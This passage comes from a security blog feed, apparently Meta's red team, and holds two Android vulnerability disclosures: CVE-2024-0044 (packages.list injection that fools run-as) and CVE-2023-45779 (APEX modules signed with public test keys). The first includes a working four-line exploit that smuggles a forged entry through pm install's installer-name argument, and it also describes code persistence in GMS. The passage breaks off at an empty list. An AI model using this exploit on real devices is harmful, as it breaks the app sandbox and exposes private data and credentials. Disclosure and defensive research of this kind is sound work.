<p>Since run-as <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/public/runas.te">isn’t allowed</a> to <code class="language-plaintext highlighter-rouge">stat()</code> privapp_data_file, check #2 should fail for a privapp either with a UID mismatch (if the fake app has the wrong data directory) or with a permission denial (if it has the right one). However, the <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp;l=73-96"><code class="language-plaintext highlighter-rouge">check_directory()</code></a> helper that performs each check includes a special case for the path <code class="language-plaintext highlighter-rouge">/data/user/0</code>. Although intended only to allow that path to be a symlink, the special case inadvertently also skips UID validation. So by setting the fake app’s data path to <code class="language-plaintext highlighter-rouge">/data/user/0</code>, the attacker can satisfy run-as’s internal security checks. And once in runas_app, they can read and write privapp_data_file because Android somewhat perplexingly <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/app.te;l=254-256">allows</a> any app to do that.</p>
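<p>The flawed logic can be sketched as follows. This is a simplified shell rendition of the C++ helper, not the real code: the actual <code class="language-plaintext highlighter-rouge">check_directory()</code> <code class="language-plaintext highlighter-rouge">stat()</code>s the path, whereas here the owner UID is passed in directly so the control flow is visible.</p>

```shell
# Simplified sketch of check_directory()'s flaw (illustrative only; the
# real helper is C++ and stat()s the path). The /data/user/0 special
# case was meant only to tolerate a symlink, but it returns early,
# before the ownership comparison ever runs.
check_directory() {
  local path=$1 expected_uid=$2 owner_uid=$3
  if [ "$path" = "/data/user/0" ]; then
    return 0  # symlink allowed -- but UID validation is skipped too
  fi
  [ "$owner_uid" = "$expected_uid" ]  # check #2: directory owned by app UID
}

# A forged entry pointing at /data/user/0 (really owned by system, UID
# 1000) passes even though the claimed app UID doesn't match:
check_directory /data/user/0 10123 1000 && echo "check bypassed"
```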

<p>On Android devices with Google Mobile Services (GMS), the attacker can gain persistence within GMS (escalating to <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/gmscore_app.te">gmscore_app</a> in the process) by rewriting the cached ODEX/VDEX files in <code class="language-plaintext highlighter-rouge">/data/user_de/0/com.google.android.gms/app_chimera/m/*/oat/</code>, which contain unsigned executable code that GMS loads. Some of that code is also loaded into apps that use Google APIs, allowing persistence there too. This isn’t a bug per se, but it does highlight the importance of <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/priv_app.te;l=17-26">enforcing W^X</a> in privapp data directories.</p>

<h2 id="exploitation">Exploitation</h2>

<p>A basic exploit takes just 4 lines:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Pretty ugly way to get the package's UID, but I couldn't find a simpler one.</span>
<span class="nv">UID</span><span class="o">=</span><span class="si">$(</span>pm list packages <span class="nt">-U</span> | <span class="nb">sed</span> <span class="nt">-n</span> <span class="s2">"s/^package:</span><span class="nv">$1</span><span class="s2"> uid://p"</span><span class="si">)</span>

<span class="c"># This is the line we inject...</span>
<span class="nv">PAYLOAD</span><span class="o">=</span><span class="s2">"@null
victim </span><span class="nv">$UID</span><span class="s2"> 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"</span>

<span class="c"># ...and this is how we inject it.</span>
pm <span class="nb">install</span> <span class="nt">-i</span> <span class="s2">"</span><span class="nv">$PAYLOAD</span><span class="s2">"</span> any-app.apk
</code></pre></div></div>

<p>Since “installer package name” is the last field in a <code class="language-plaintext highlighter-rouge">packages.list</code> entry, all we have to do is provide a legitimate-looking value followed by a newline and any forged entry we want. For this PoC, we gave the forged entry a package name of “victim”, meaning <code class="language-plaintext highlighter-rouge">run-as victim</code> will switch to the UID and SELinux context described by that line. We set the UID dynamically based on the real package we intend to exploit, and all the other fields are set to fixed or dummy values:</p>

<ul>
  <li>The third field, <code class="language-plaintext highlighter-rouge">1</code>, indicates the package is debuggable.</li>
  <li>The fourth, <code class="language-plaintext highlighter-rouge">/data/user/0</code>, is the data path needed to target privapps, as described above.</li>
  <li>The fifth field is used to derive the SELinux domain and is set to a generic value that will work for any app targeting API &gt;= 28.</li>
  <li>The other fields don’t matter to run-as.</li>
</ul>
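<p>Read back the way run-as will see it, the forged entry splits into exactly those fields. A quick illustration (the UID here is a made-up stand-in for whatever <code class="language-plaintext highlighter-rouge">pm list packages -U</code> returned; the real parser is C++):</p>

```shell
# A packages.list entry in the format described above. 10123 is a
# placeholder UID for illustration.
line='victim 10123 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null'

# Split on whitespace; only the first five fields matter to run-as.
set -- $line
name=$1 uid=$2 debuggable=$3 data_path=$4 seinfo=$5

echo "run-as $name -> UID $uid, data path $data_path, seinfo $seinfo"
```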

<h2 id="attack-scenarios">Attack scenarios</h2>

<p>A local attacker with ADB shell access to an Android 12 or 13 device with Developer Mode enabled can exploit the vulnerability to run code in the context of any non-<code class="language-plaintext highlighter-rouge">system</code>-UID app. From there, the attacker can do anything the app can, like access its private data files or read the credentials it’s stored in AccountManager. This violates the security guarantees of the <a href="https://source.android.com/docs/security/app-sandbox">Application Sandbox</a>, which is supposed to safeguard an app’s data from even the owner of the device.</p>

<p>Non-<code class="language-plaintext highlighter-rouge">system</code> privapps are vulnerable, but for those the attacker does not gain any SELinux permissions beyond what run-as grants for a normal unprivileged app. That means no access to Binder APIs <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/public/service.te">marked</a> only as <code class="language-plaintext highlighter-rouge">system_api_service</code>, for example.</p>

<h2 id="response">Response</h2>

<p>We reported this vulnerability privately to Google on October 24, 2023. Google acknowledged our report immediately, and the Android Security Team rated it as High severity the following week. On December 19th, Google informed us they’d developed a fix and planned to release it with the March Android Security Bulletin, which they acknowledged was past Meta’s default 90-day disclosure period. We offered to move our disclosure to match theirs, as is <a href="https://about.meta.com/security/vulnerability-disclosure-policy">our policy</a> when a vendor demonstrates a good-faith effort to promptly address an issue.</p>

<p>As planned, this post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2">our accompanying disclosure</a>, and the <a href="https://source.android.com/docs/security/bulletin/2024-03-01">March ASB</a> were all released today.</p>

<h2 id="issue-list">Issue list</h2>

<p>For ease of reference, here’s a numbered list of the technical flaws we identified in this report:</p>

<ol>
  <li>[Bug] It’s possible to inject newlines and spaces into <code class="language-plaintext highlighter-rouge">packages.list</code> on Android 12 and 13.</li>
  <li>[Bug] run-as accepts <code class="language-plaintext highlighter-rouge">/data/user/0</code> as a data directory for any app.</li>
  <li>[Weakness] run-as trusts the data path from <code class="language-plaintext highlighter-rouge">packages.list</code> when <code class="language-plaintext highlighter-rouge">userId == 0</code>, even though it has enough information to construct that path itself (as demonstrated by the <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp;l=203-209">userId != 0 case</a>).</li>
  <li>[Weakness] untrusted_app is granted broad SELinux permissions on privapp_data_file, even though (as far as we’re aware) there’s no legitimate need for write access.</li>
  <li>[Weakness] Android stores AOT-compiled ODEX/VDEX files alongside the APK they’re for, even when that APK is in an app-writable data directory. It does not apply an alternate SELinux label, such as the already-extant <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/app_neverallows.te;l=52-56">app_exec_data_file</a>, to prevent apps from altering them.</li>
</ol>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>July 23rd, 2022: We notice the <code class="language-plaintext highlighter-rouge">packages.list</code> injection vulnerability as part of unrelated Android research and build a basic run-as PoC, but other planned work prevents us from investigating further.</li>
  <li>May 5th, 2023: We return to the issue and discover the exploit can be tweaked to work for privapps too. We begin looking for interesting data files among privileged apps.</li>
  <li>June 5th, 2023: We demonstrate persistent code execution in GMS and in apps that use Google SDKs by modifying cached code in GMS’s data directory.</li>
  <li>October 24th, 2023: We report our findings to Google, who passes them to the Android Security Team.</li>
  <li>November 3rd, 2023: Google notifies us that they’ve rated the issue High severity.</li>
  <li>December 12th, 2023: We ask Google why they settled on High severity, as that contravenes their <a href="https://source.android.com/docs/security/overview/updates-resources#severity">published rubric</a> which says that exploits requiring Developer Mode are Low severity at most. Google responds that attacks “against the device or an app on the device”, as opposed to “against the device user themselves”, are not subject to that restriction.</li>
  <li>December 19th, 2023: Google says they’ve developed a fix for the injection vulnerability but won’t be able to release it until the March 4th, 2024 Android Security bulletin. They ask for an extension of our tentative 90-day disclosure date, which we agree to.</li>
  <li>December 22nd, 2023: We meet briefly with members of the Google VRP and Android Security teams to discuss details of the disclosure plan. Google tells us that the report qualifies for a $7,000 bounty.</li>
  <li>January 16th, 2024: Google officially offers us the bounty, which we ask them on January 26th to donate to charity. (Google, like Meta, doubles bounties paid to charity.)</li>
  <li>February 6th, 2024: We ask Google to confirm the CVE ID of CVE-2024-0044, which we learned from the March ASB partner preview, as they had not yet told us. They confirm it.</li>
  <li>March 4th, 2024: This post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2">our disclosure</a>, and the <a href="https://source.android.com/docs/security/bulletin/2024-03-01">March ASB</a> all go live.</li>
</ul>

<h2 id="footnotes">Footnotes</h2>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:14-not-affected" role="doc-endnote">
      <p>In Android 14, <code class="language-plaintext highlighter-rouge">PackageInstallerService</code> ensures the installer package name references an installed package, so the issue is no longer exploitable. However, the check is still fairly high in the call stack and the <a href="https://cs.android.com/android/_/android/platform/frameworks/base/+/f052ba7eb8fba18cf93326a5c77a5ffd6ce85266">change that added it</a> seems to have fixed this issue inadvertently rather than intentionally, so we still recommend additional defense in depth. <a href="#fnref:14-not-affected" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:entry-order" role="doc-endnote">
      <p>Entries in <code class="language-plaintext highlighter-rouge">packages.list</code> are deterministically ordered by Java’s <code class="language-plaintext highlighter-rouge">String.hashCode()</code>, so it’s possible to craft a package that appears at the very top whose injected entries a parser will always see before real entries with the same package name. The name <code class="language-plaintext highlighter-rouge">com.hashed.first.WHGCXIP</code> is one of many that hashes to the lowest possible value and <code class="language-plaintext highlighter-rouge">com.hashed.last.JJEJTOC</code> is likewise for the highest. Since <code class="language-plaintext highlighter-rouge">run-as</code> doesn’t care about package name, we didn’t have to use this trick in our PoC. <a href="#fnref:entry-order" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:other-users" role="doc-endnote">
      <p><code class="language-plaintext highlighter-rouge">packages.list</code> has other clients, like <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/extras/simpleperf/simpleperf_app_runner/simpleperf_app_runner.cpp;l=85">simpleperf_app_runner</a>, but <code class="language-plaintext highlighter-rouge">run-as</code> is the one for which this issue causes by far the greatest security threat. <a href="#fnref:other-users" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="exploitation" /><summary type="html"><![CDATA[An attacker with ADB access to an Android device can trick the “run-as” tool into believing any app is debuggable. By doing so, they can read and write private data and invoke system APIs as if they were most apps on the system—including many privileged apps, but not ones that run as the system user. Furthermore, they can achieve persistent code execution as Google Mobile Services (GMS) or as apps that use its SDKs by altering executable code that GMS caches in its data directory.]]></summary></entry><entry><title type="html">Missing signs: how several brands forgot to secure a key piece of Android</title><link href="https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html" rel="alternate" type="text/html" title="Missing signs: how several brands forgot to secure a key piece of Android" /><published>2024-01-30T00:00:00+00:00</published><updated>2024-01-30T00:00:00+00:00</updated><id>https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys</id><content type="html" xml:base="https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html"><![CDATA[<p>We recently discovered that Android devices from multiple major brands sign APEX modules—updatable units of highly-privileged OS code—using private keys from Android’s public source repository. Anyone can forge an APEX update for such a device to gain near-total control over it. Rather than negligence by any particular manufacturer (OEM), we believe that unsafe defaults, poor documentation, and incomplete CTS coverage in the Android Open Source Project (AOSP) were the main causes of this issue.</p>

<p>Google assigned the issue <a href="https://www.cve.org/CVERecord?id=CVE-2023-45779">CVE-2023-45779</a>, and most affected OEMs have now fixed it. Any device that comes with the Play Store is no longer vulnerable if it advertises at least a 2023-12-05 Security Patch Level (SPL).</p>

<h2 id="background">Background</h2>

<p><a href="https://source.android.com/docs/core/ota/apex">APEX modules</a> allow OEMs to update certain files in an OS image without issuing a full OTA. To that end, each updatable unit (e.g. Bionic or ART) lives in its own ext4 filesystem image inside an <code class="language-plaintext highlighter-rouge">.apex</code> ZIP file, which gets mounted under <code class="language-plaintext highlighter-rouge">/apex</code>. An initial version of each APEX is preinstalled in <code class="language-plaintext highlighter-rouge">/system/apex</code> (or <code class="language-plaintext highlighter-rouge">/vendor/apex</code>, etc.) during the OS build, but those versions can be superseded by updates installed later in <code class="language-plaintext highlighter-rouge">/data/apex</code>.</p>

<p>To ensure APEX updates are trustworthy, Android checks that each one is signed with the same keys as the preinstalled version of that APEX. APEXes carry both a standard APK signature and an <a href="https://android.googlesource.com/platform/external/avb/+/main/README.md">AVB</a> signature on their interior filesystem, and both are checked in this way. So to create a valid APEX update, one must possess both the APK and AVB private keys that were used to sign that APEX when the OS was built.</p>
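<p>In other words, accepting an update reduces to comparing key material against the preinstalled APEX. A toy sketch of that acceptance rule (file names and key bytes below are purely illustrative; real keys are RSA, and there are two parallel checks, one for the APK signature and one for AVB):</p>

```shell
# Stand-ins for the public keys embedded in the preinstalled APEX and
# in a candidate update (illustrative bytes, not real key material).
printf 'oem-release-key' > preinstalled.pubkey
printf 'oem-release-key' > update.pubkey

# Android's rule, approximately: same key, or the update is rejected.
if cmp -s preinstalled.pubkey update.pubkey; then
  echo "update accepted"
else
  echo "update rejected"
fi
```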

<p>When it comes to signatures, though, an “OS build” isn’t just one step. Android’s core build system signs every APEX, APK, and OTA image it produces with a fixed set of “test keys”, and there’s no way to change that. Test keys are public in AOSP’s source tree: for example, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:art/build/apex/com.android.art.pem">this</a> is the test key that signs the filesystem of the <code class="language-plaintext highlighter-rouge">com.android.art</code> APEX.</p>

<p>As described <a href="https://source.android.com/docs/core/ota/sign_builds">in AOSP’s documentation</a>, the job of re-signing a build with OEM-held “release keys” falls to a Python script called <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/tools/releasetools/sign_target_files_apks.py"><code class="language-plaintext highlighter-rouge">sign_target_files_apks</code></a>, which unpacks a built image, replaces all the signatures, and repacks it. Re-signing as a separate step has several benefits, but it also introduces the risk that not every test signature will get replaced. And that’s exactly what seems to have happened for several OEMs.</p>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>We analyzed OS images of recent Android devices from 14 reputable brands (listed below) and found that seven of those devices contained at least one preinstalled APEX signed only with AOSP test keys, for which anyone can produce an update.</p>

<p>Every vulnerable device we found had one highly-privileged vulnerable APEX in common—<code class="language-plaintext highlighter-rouge">com.android.vndk</code>. This APEX holds shared libraries that <a href="https://source.android.com/docs/core/architecture/hal">HALs</a> in the <code class="language-plaintext highlighter-rouge">/vendor</code> partition link against. Thanks to the existence of Same-Process HALs, those libraries get transitively loaded into most processes on an Android system, including</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">zygote64</code>, from which System Server and every app process is forked;</li>
  <li><code class="language-plaintext highlighter-rouge">surfaceflinger</code>, through which all screen contents pass;</li>
  <li>and of course all the HALs.</li>
</ul>

<p>We demonstrated code execution in all of the above via a malicious <code class="language-plaintext highlighter-rouge">com.android.vndk.v31</code> APEX update for a vulnerable device, a Lenovo Tab M10 Plus (Gen 3, Wi-Fi) running Android 13. You can find our proof-of-concept, as well as a script to check for vulnerable APEXes, <a href="https://github.com/metaredteam/rtx-cve-2023-45779">here</a>.</p>
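<p>The core of such a check is small: hash the public key embedded in each preinstalled APEX and flag any that matches a known AOSP test key. Here’s a toy version of the idea (everything below — paths, file names, key bytes — is illustrative; our real script linked above operates on actual <code class="language-plaintext highlighter-rouge">.apex</code> files):</p>

```shell
# Known AOSP test keys (stand-in bytes) and "extracted" device pubkeys.
mkdir -p testkeys device
printf 'aosp-test-key' > testkeys/com.android.vndk.pubkey
printf 'aosp-test-key' > device/com.android.vndk.v31.pubkey   # not re-signed
printf 'oem-release-key' > device/com.android.wifi.pubkey     # re-signed

# Hash every known test key, then flag device APEX keys that match one.
known=$(sha256sum testkeys/* | awk '{print $1}')
for f in device/*; do
  h=$(sha256sum "$f" | awk '{print $1}')
  if printf '%s\n' "$known" | grep -q "$h"; then
    echo "VULNERABLE: $f matches an AOSP test key"
  fi
done
```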

<p>As an aside, <code class="language-plaintext highlighter-rouge">com.android.vndk</code> is somewhat odd because there are multiple copies of it—one for each Android API level <code class="language-plaintext highlighter-rouge">/vendor</code> can target, of which there are several thanks to <a href="https://android-developers.googleblog.com/2017/05/here-comes-treble-modular-base-for.html">Project Treble</a>. Each copy has a different APEX name (e.g. <code class="language-plaintext highlighter-rouge">com.android.vndk.v33</code> for Android 13), and it’s only useful to exploit the one <code class="language-plaintext highlighter-rouge">/vendor</code> actually uses. On all the devices we tested, every copy was equally vulnerable.</p>

<h2 id="attack-scenarios">Attack scenarios</h2>

<p>Fortunately, Android tightly controls who can install APEX updates. Although APEXes look like APKs and are installed via PackageManager, the <code class="language-plaintext highlighter-rouge">INSTALL_APEX</code> flag is <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:frameworks/base/services/core/java/com/android/server/pm/PackageInstallerService.java;l=745-753">restricted</a> to packages that hold <code class="language-plaintext highlighter-rouge">android.permission.INSTALL_PACKAGES</code> or <code class="language-plaintext highlighter-rouge">android.permission.INSTALL_PACKAGE_UPDATES</code>, both of which are <code class="language-plaintext highlighter-rouge">signature|privileged</code> permissions and cannot be obtained by third-party apps. And even packages with that permission <a href="https://cs.android.com/android/_/android/platform/frameworks/base/+/e501fd8379b1849cd3ae4f7a0485c7890aa87179">must additionally</a> either</p>

<ul>
  <li>run as the <code class="language-plaintext highlighter-rouge">system</code> user,</li>
  <li>run as the <code class="language-plaintext highlighter-rouge">shell</code> user, or</li>
  <li>be designated as “module installer” in <code class="language-plaintext highlighter-rouge">/{system,vendor,product,odm}/etc/sysconfig/</code>.</li>
</ul>

<p>In practice, that limits the exploitability to four attack scenarios:</p>

<ol>
  <li>A user uses <code class="language-plaintext highlighter-rouge">adb shell</code> to exploit their own device, gaining access to nearly everything a typical “root” would get them. Since access is distributed across many SELinux contexts, root-aware tools and apps won’t work unmodified. On the other hand, root detections won’t trip: to them, the malicious APEX will be indistinguishable from legitimate OS code.</li>
  <li>A malicious actor with physical access to an unlocked device uses <code class="language-plaintext highlighter-rouge">adb shell</code> to install persistent malware without the user’s knowledge and gains long-term access to all data and activity on the device. The malware will likely go undetected by on-device scanners for the same reason a root will.</li>
  <li>A malicious actor chains this exploit to one that gets them code execution in <code class="language-plaintext highlighter-rouge">com.android.vending</code> (the “module installer” on all <a href="https://android-developers.googleblog.com/2019/05/fresher-os-with-projects-treble-and-mainline.html">Project Mainline</a> devices) or a <code class="language-plaintext highlighter-rouge">system</code> UID app to escalate their privileges and gain persistence.</li>
  <li>A malicious actor who gains access to whatever Google Play backend serves APEX updates remotely exploits devices en masse. We do not know the details of Project Mainline’s infrastructure so cannot assess how feasible this is. For example, it becomes far more plausible if OEMs are allowed to upload APEX updates to Google Play than if only Google is, as there are more credentials for an attacker to compromise. In that case, depending on the specifics of update targeting, a malicious OEM could potentially even exploit other OEMs’ devices.</li>
</ol>

<h2 id="root-cause">Root cause</h2>

<p>Why did so many OEMs make the exact same mistake? Recall that AOSP comes with <a href="https://source.android.com/docs/core/ota/sign_builds">instructions</a> to re-sign a build, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/tools/releasetools/sign_target_files_apks.py">a script</a> to perform that re-signing, and—as a last line of defense—its extensive <a href="https://source.android.com/docs/compatibility/cts">Compatibility Test Suite</a>, which enforces various compatibility and security guarantees. Shouldn’t one of those have warned OEMs of vulnerable APEXes?</p>

<p>In answering that question, we uncovered a number of deficiencies in AOSP that, together, make it far easier to create a vulnerable build than a secure one.</p>

<h3 id="incomplete-cts-coverage">Incomplete CTS coverage</h3>

<p>Most critically, we found that several APEXes are not checked by CTS at all. Two CTS tests look for test keys: <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:cts/tests/tests/security/src/android/security/cts/PackageSignatureTest.java;l=81-109">PackageSignatureTest</a> checks both APKs and APEXes for insecure APK signatures, while <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:cts/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java">ApexSignatureVerificationTest</a> checks APEXes for insecure AVB signatures. But both tests hardcode lists of test keys, which over time have diverged from those actually in use. As a result, several vulnerable APEXes are not caught by either test.</p>

<p>The nature of APEXes makes such divergence inevitable: unlike APKs, which share <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/target/product/security/">just a few test keys</a>, APEXes all have different test keys, meaning each new APEX is a new opportunity for divergence. In our view, the only fix is for CTS to check signatures against the source of truth—the build system. In fact, the build system already records which test keys it uses to a file called <code class="language-plaintext highlighter-rouge">apexkeys.txt</code>, which plays a part in…</p>
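<p>A build-system-derived check is straightforward, because <code class="language-plaintext highlighter-rouge">apexkeys.txt</code> names the signing key for every APEX. A sketch of the idea (the excerpt below is simplified and hypothetical — real entries carry more fields, and the OEM key directory will differ per vendor):</p>

```shell
# Simplified, hypothetical apexkeys.txt. Lines whose private_key path
# points back into the AOSP source tree were signed with test keys.
cat > apexkeys.txt <<'EOF'
name="com.android.art.apex" private_key="art/build/apex/com.android.art.pem"
name="com.android.vndk.v33.apex" private_key="external/avb/test/data/testkey_rsa4096.pem"
name="com.oem.widget.apex" private_key="vendor/oem/keys/widget.pem"
EOF

# Flag everything not signed by a key under the (assumed) OEM key dir.
grep -v 'private_key="vendor/oem/keys/' apexkeys.txt
```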

<h3 id="unsafe-defaults">Unsafe defaults</h3>

<p><a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/tools/releasetools/sign_target_files_apks.py"><code class="language-plaintext highlighter-rouge">sign_target_files_apks</code></a>, which re-signs a build, doesn’t guarantee replacement of every test signature. On the contrary, it doesn’t replace any test signatures by default! Run without arguments, it signs each APEX and APK using the very same test keys the build system did, which it finds by parsing <code class="language-plaintext highlighter-rouge">apexkeys.txt</code> and <code class="language-plaintext highlighter-rouge">apkcerts.txt</code> respectively. We assume this default was intended as a starting state for arguments like <code class="language-plaintext highlighter-rouge">--key_mapping</code>, but we’re unsure why the absence of such arguments doesn’t result in at least a warning.</p>

<p>Here too, a risk that was low for APKs—forgetting to specify a test key’s replacement—became a near certainty once APEXes appeared. Because each APEX has its own test keys, each must be mapped to a release key individually. And although enumerating every APEX in Android is clearly error-prone—especially as new Android versions regularly add and remove APEXes—that’s exactly what AOSP’s documentation <a href="https://source.android.com/docs/core/ota/sign_builds#apex-signing-key-replacement">instructs</a> OEMs to do. And speaking of that documentation…</p>

<h3 id="poor-documentation">Poor documentation</h3>

<p>AOSP’s “<a href="https://source.android.com/docs/core/ota/sign_builds">Sign builds for release</a>” article begins by declaring that Android uses signatures in “two places”, APKs and OTA updates. There is no mention of APEX signatures in the introduction, nor anywhere prior to a section titled “Advanced signing options”, which gives the guidance above.</p>

<p>Furthermore, neither the names nor the locations of APEX test keys themselves (e.g. <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:art/build/apex/com.android.art.pem">this one</a>) make it clear that they’re test keys. In contrast, APK test keys all live in <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/target/product/security/">a single directory</a> alongside a notice that they should “NEVER be used to sign packages in publicly released images”.</p>

<p>Without documentation to the contrary, an OEM might believe that APEX re-signing is optional or unimportant until CTS failures arise. They then might address those failures and think nothing more of the matter, confident that CTS and <code class="language-plaintext highlighter-rouge">sign_target_files_apks</code> know what needs signing. And who could fault them for that?</p>

<h3 id="other-factors">Other factors</h3>

<p>Although far less important than the three issues above, these two details may have also misled OEMs:</p>

<ol>
  <li>In <code class="language-plaintext highlighter-rouge">Android.bp</code> files, some APEXes, including <code class="language-plaintext highlighter-rouge">com.android.vndk</code>, are marked <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:packages/modules/vndk/apex/Android.bp;l=25"><code class="language-plaintext highlighter-rouge">updatable: false</code></a>. That might lead OEMs to believe that such APEXes cannot be updated and so don’t need secure keys, but in fact all it means is that the build system will not “enforce additional rules for making sure that the APEX is truly updatable”.</li>
  <li><code class="language-plaintext highlighter-rouge">com.android.vndk</code> is not in Google’s <a href="https://source.android.com/docs/core/ota/modular-system">documented list of APEXes</a>. Additionally, the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:packages/modules/vndk/apex/com.android.vndk.pubkey">AVB test key files</a> for <code class="language-plaintext highlighter-rouge">com.android.vndk</code> end in <code class="language-plaintext highlighter-rouge">.pubkey</code> rather than the more common <code class="language-plaintext highlighter-rouge">.avbpubkey</code>, which could cause naive enumeration strategies to miss them.</li>
</ol>

<h2 id="response">Response</h2>

<p>We reported our findings privately to Google on September 19th, 2023. Google acknowledged our report immediately, and the Android Security Team confirmed it as valid within a week. On September 25th, Google issued Partner Security Advisory 2023-11, advising its OEM partners of the issue and how to fix it. Around the same time, Google individually contacted each affected OEM we identified.</p>

<p>To ensure that OEMs re-signed vulnerable APEXes, Google added a test to their proprietary Build Test Suite (BTS), through which all updates to <a href="https://www.android.com/certified/partners/">Play Protect certified</a> devices pass. The test warned of vulnerable APEXes starting November 1st and, for updates claiming a <a href="https://source.android.com/docs/security/bulletin/2023-12-01">December 2023 patch level</a> or higher, rejected them outright starting December 4th.</p>

<p>Google has also fixed the deficiencies we identified in CTS. We have not seen those fixes, which won’t be made public until the release of Android V. Nonetheless, we believe the vast majority of real-world risk is now gone: OEMs have had ample time to patch their devices since Google’s initial advisory, and a spot check we performed on January 25th revealed that most have done so.</p>

<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-45779">CVE-2023-45779</a> was made public by Google on December 4th but contained no details. This post and <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962">our accompanying disclosure</a> are the first public descriptions of the issue. Google plans to update the CVE with more detail after we publish this post.</p>

<h2 id="tested-devices">Tested devices</h2>

<h3 id="entry-format">Entry format</h3>

<ul>
  <li><strong>Device name</strong><br />
<code class="language-plaintext highlighter-rouge">ro.build.fingerprint</code><br />
Where we obtained the OS image<br />
Vulnerable APEXes, if any</li>
</ul>

<h3 id="vulnerable">Vulnerable</h3>

<p><em>NOTE: On every device we checked, either all versions of the VNDK APEX were vulnerable or none of them were. For brevity, we’ve only listed the VNDK version that’s actually used by each vulnerable device.</em></p>

<ul>
  <li><strong>Asus Zenfone 9</strong><br />
<code class="language-plaintext highlighter-rouge">asus/WW_AI2202/ASUS_AI2202:13/TKQ1.220807.001/33.0804.2060.142:user/release-keys</code><br />
<a href="https://www.asus.com/mobile-handhelds/phones/zenfone/zenfone-9/helpdesk_bios/?model2Name=Zenfone-9">Official ASUS OTA ZIP</a><br />
com.android.vndk.v32, com.android.uwb, com.android.wifi</li>
  <li><strong>vivo X90 Pro</strong><br />
<code class="language-plaintext highlighter-rouge">vivo/V2219/V2219:14/UP1A.230620.001/compiler07281738:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/vivo/v2219">dumps.tadiphone.dev, vivo/v2219</a><br />
com.android.vndk.v33, com.android.rkpd, com.android.uwb, com.android.virt, com.android.wifi</li>
  <li><strong>Nokia G50</strong><br />
<code class="language-plaintext highlighter-rouge">Nokia/Punisher_00WW/PHR_sprout:13/TKQ1.220807.001/00WW_3_320:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/nokia/phr_sprout">dumps.tadiphone.dev, nokia/phr_sprout</a><br />
com.android.vndk.v30</li>
  <li><strong>Microsoft Surface Duo 2</strong><br />
<code class="language-plaintext highlighter-rouge">surface/duo2/duo2:12/2023.429.67/202304290067:user/release-keys</code><br />
<a href="https://support.microsoft.com/en-us/surface-recovery-image">Official Microsoft OTA ZIP</a><br />
com.android.vndk.v30, com.android.appsearch, com.android.wifi</li>
  <li><strong>Lenovo Tab M10 Plus (Gen 3, Wi-Fi)</strong><br />
<code class="language-plaintext highlighter-rouge">Lenovo/TB125FU/TB125FU:13/TP1A.220624.014/S100078_230713_ROW:user/release-keys</code><br />
Physical device<br />
com.android.vndk.v31, com.android.uwb, com.android.wifi</li>
  <li><strong>Nothing Phone 2</strong><br />
<code class="language-plaintext highlighter-rouge">Nothing/Pong/Pong:13/TKQ1.221220.001/2308181943:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/nothing/pong">dumps.tadiphone.dev, Nothing/Pong</a><br />
com.android.vndk.v32, com.android.uwb, com.android.wifi</li>
  <li><strong>Fairphone 5</strong><br />
<em>NOTE: Fairphone did their own investigation in response to our report and discovered that Fairphone 3, 3+, and 4 were also vulnerable. You can read their statement <a href="https://www.fairphone.com/en/2023/12/22/security-update-apex-modules-vulnerability-fixed">here</a>.</em><br />
<code class="language-plaintext highlighter-rouge">Fairphone/FP5/FP5:13/TKQ1.230127.002/TT3G:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/fairphone/fp5">dumps.tadiphone.dev, fairphone/fp5</a><br />
com.android.vndk.v30, com.android.uwb, com.android.wifi</li>
</ul>

<h3 id="not-vulnerable">Not vulnerable</h3>

<ul>
